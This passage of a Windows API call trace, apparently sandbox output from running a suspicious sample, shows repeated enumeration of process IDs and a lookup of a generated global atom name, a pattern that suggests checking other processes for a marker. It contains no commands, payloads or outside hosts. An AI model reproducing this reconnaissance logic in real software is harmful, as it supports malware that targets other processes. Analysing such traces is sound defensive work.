	[0119.769] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0119.770] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0119.770] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0119.770] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0119.770] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0119.770] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0119.770] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0119.770] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0119.771] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0119.771] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x698
	[0119.771] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.771] CloseHandle (hObject=0x698) returned 1
	[0119.771] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0119.771] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0119.771] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x698
	[0119.771] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.771] CloseHandle (hObject=0x698) returned 1
	[0119.772] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0119.772] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x698
	[0119.772] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.772] CloseHandle (hObject=0x698) returned 1
	[0119.772] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x698
	[0119.772] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.772] CloseHandle (hObject=0x698) returned 1
	[0119.772] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x698
	[0119.772] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.772] CloseHandle (hObject=0x698) returned 1
	[0119.772] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x698
	[0119.772] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.772] CloseHandle (hObject=0x698) returned 1
	[0119.773] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x698
	[0119.773] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.773] CloseHandle (hObject=0x698) returned 1
	[0119.773] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x698
	[0119.773] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.773] CloseHandle (hObject=0x698) returned 1
	[0119.773] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0119.773] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x698
	[0119.773] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.774] CloseHandle (hObject=0x698) returned 1
	[0119.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x698
	[0119.774] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.774] CloseHandle (hObject=0x698) returned 1
	[0119.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x698
	[0119.774] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.774] CloseHandle (hObject=0x698) returned 1
	[0119.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x698
	[0119.774] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.774] CloseHandle (hObject=0x698) returned 1
	[0119.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x698
	[0119.775] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.775] CloseHandle (hObject=0x698) returned 1
	[0119.775] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x698
	[0119.775] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.775] CloseHandle (hObject=0x698) returned 1
	[0119.775] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x698
	[0119.775] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.775] CloseHandle (hObject=0x698) returned 1
	[0119.775] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x698
	[0119.775] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.775] CloseHandle (hObject=0x698) returned 1
	[0119.775] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x698
	[0119.775] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.776] CloseHandle (hObject=0x698) returned 1
	[0119.776] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x698
	[0119.776] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.776] CloseHandle (hObject=0x698) returned 1
	[0119.776] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x698
	[0119.776] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.776] CloseHandle (hObject=0x698) returned 1
	[0119.776] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x698
	[0119.776] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.776] CloseHandle (hObject=0x698) returned 1
	[0119.776] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x698
	[0119.776] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.776] CloseHandle (hObject=0x698) returned 1
	[0119.776] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x698
	[0119.777] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.777] CloseHandle (hObject=0x698) returned 1
	[0119.777] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x698
	[0119.777] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.777] CloseHandle (hObject=0x698) returned 1
	[0119.777] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x698
	[0119.777] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.778] CloseHandle (hObject=0x698) returned 1
	[0119.778] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x698
	[0119.778] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.778] CloseHandle (hObject=0x698) returned 1
	[0119.778] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x698
	[0119.778] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.778] CloseHandle (hObject=0x698) returned 1
	[0119.779] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x698
	[0119.779] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.779] CloseHandle (hObject=0x698) returned 1
	[0119.779] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x698
	[0119.779] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.779] CloseHandle (hObject=0x698) returned 1
	[0119.779] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x698
	[0119.779] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.779] CloseHandle (hObject=0x698) returned 1
	[0119.779] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x698
	[0119.779] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.779] CloseHandle (hObject=0x698) returned 1
	[0119.779] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0119.779] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.780] CloseHandle (hObject=0x698) returned 1
	[0119.780] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0119.780] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0119.780] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0119.780] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0119.780] wsprintfA (in: param_1=0x39935b0, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0119.781] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0119.781] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0119.781] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0119.781] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0119.781] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0119.781] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0119.781] CloseHandle (hObject=0x698) returned 1
	[0119.781] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0119.782] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x698
	[0119.782] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.782] CloseHandle (hObject=0x698) returned 1
	[0119.782] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x698
	[0119.782] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.782] CloseHandle (hObject=0x698) returned 1
	[0119.782] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x698
	[0119.782] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.782] CloseHandle (hObject=0x698) returned 1
	[0119.818] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0119.818] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0119.818] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0119.818] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0119.818] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0119.818] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0119.819] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0119.819] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0119.819] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0119.819] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0119.819] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0119.820] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0119.820] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0119.820] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0119.820] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0119.820] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0119.820] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0119.820] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0119.821] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x698
	[0119.821] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.821] CloseHandle (hObject=0x698) returned 1
	[0119.821] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0119.821] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0119.821] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x698
	[0119.821] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.821] CloseHandle (hObject=0x698) returned 1
	[0119.821] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0119.822] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x698
	[0119.822] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.822] CloseHandle (hObject=0x698) returned 1
	[0119.822] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x698
	[0119.822] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.822] CloseHandle (hObject=0x698) returned 1
	[0119.822] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x698
	[0119.822] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.822] CloseHandle (hObject=0x698) returned 1
	[0119.822] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x698
	[0119.822] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.822] CloseHandle (hObject=0x698) returned 1
	[0119.822] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x698
	[0119.822] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.822] CloseHandle (hObject=0x698) returned 1
	[0119.823] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x698
	[0119.823] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.823] CloseHandle (hObject=0x698) returned 1
	[0119.823] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0119.824] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x698
	[0119.824] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.824] CloseHandle (hObject=0x698) returned 1
	[0119.824] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x698
	[0119.824] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.824] CloseHandle (hObject=0x698) returned 1
	[0119.824] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x698
	[0119.824] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.824] CloseHandle (hObject=0x698) returned 1
	[0119.824] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x698
	[0119.824] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.824] CloseHandle (hObject=0x698) returned 1
	[0119.824] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x698
	[0119.824] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.824] CloseHandle (hObject=0x698) returned 1
	[0119.825] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x698
	[0119.825] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.825] CloseHandle (hObject=0x698) returned 1
	[0119.825] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x698
	[0119.825] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.825] CloseHandle (hObject=0x698) returned 1
	[0119.825] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x698
	[0119.825] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.825] CloseHandle (hObject=0x698) returned 1
	[0119.825] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x698
	[0119.825] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.825] CloseHandle (hObject=0x698) returned 1
	[0119.826] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x698
	[0119.826] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.826] CloseHandle (hObject=0x698) returned 1
	[0119.826] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x698
	[0119.826] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.826] CloseHandle (hObject=0x698) returned 1
	[0119.826] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x698
	[0119.826] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.826] CloseHandle (hObject=0x698) returned 1
	[0119.826] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x698
	[0119.826] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.826] CloseHandle (hObject=0x698) returned 1
	[0119.826] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x698
	[0119.827] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.827] CloseHandle (hObject=0x698) returned 1
	[0119.827] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x698
	[0119.827] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.827] CloseHandle (hObject=0x698) returned 1
	[0119.827] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x698
	[0119.827] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.827] CloseHandle (hObject=0x698) returned 1
	[0119.827] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x698
	[0119.827] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.827] CloseHandle (hObject=0x698) returned 1
	[0119.827] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x698
	[0119.827] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.827] CloseHandle (hObject=0x698) returned 1
	[0119.828] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x698
	[0119.828] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.828] CloseHandle (hObject=0x698) returned 1
	[0119.828] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x698
	[0119.828] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.828] CloseHandle (hObject=0x698) returned 1
	[0119.828] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x698
	[0119.828] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.828] CloseHandle (hObject=0x698) returned 1
	[0119.828] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x698
	[0119.828] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.828] CloseHandle (hObject=0x698) returned 1
	[0119.829] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0119.829] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.829] CloseHandle (hObject=0x698) returned 1
	[0119.829] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0119.829] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0119.829] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0119.830] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0119.830] wsprintfA (in: param_1=0x3993150, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0119.830] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0119.830] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0119.830] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0119.830] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0119.831] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0119.831] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0119.831] CloseHandle (hObject=0x698) returned 1
	[0119.831] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0119.831] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x698
	[0119.831] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.831] CloseHandle (hObject=0x698) returned 1
	[0119.831] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x698
	[0119.831] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.831] CloseHandle (hObject=0x698) returned 1
	[0119.831] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x698
	[0119.831] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.831] CloseHandle (hObject=0x698) returned 1
	[0119.867] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0119.867] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0119.867] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0119.867] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0119.867] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0119.867] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0119.868] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0119.868] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0119.868] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0119.868] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0119.868] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0119.868] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0119.869] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0119.869] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0119.869] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0119.869] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0119.869] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0119.869] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0119.870] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x698
	[0119.870] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.870] CloseHandle (hObject=0x698) returned 1
	[0119.870] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0119.870] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0119.870] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x698
	[0119.870] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0119.870] CloseHandle (hObject=0x698) returned 1
	[0119.870] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0119.870] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x698
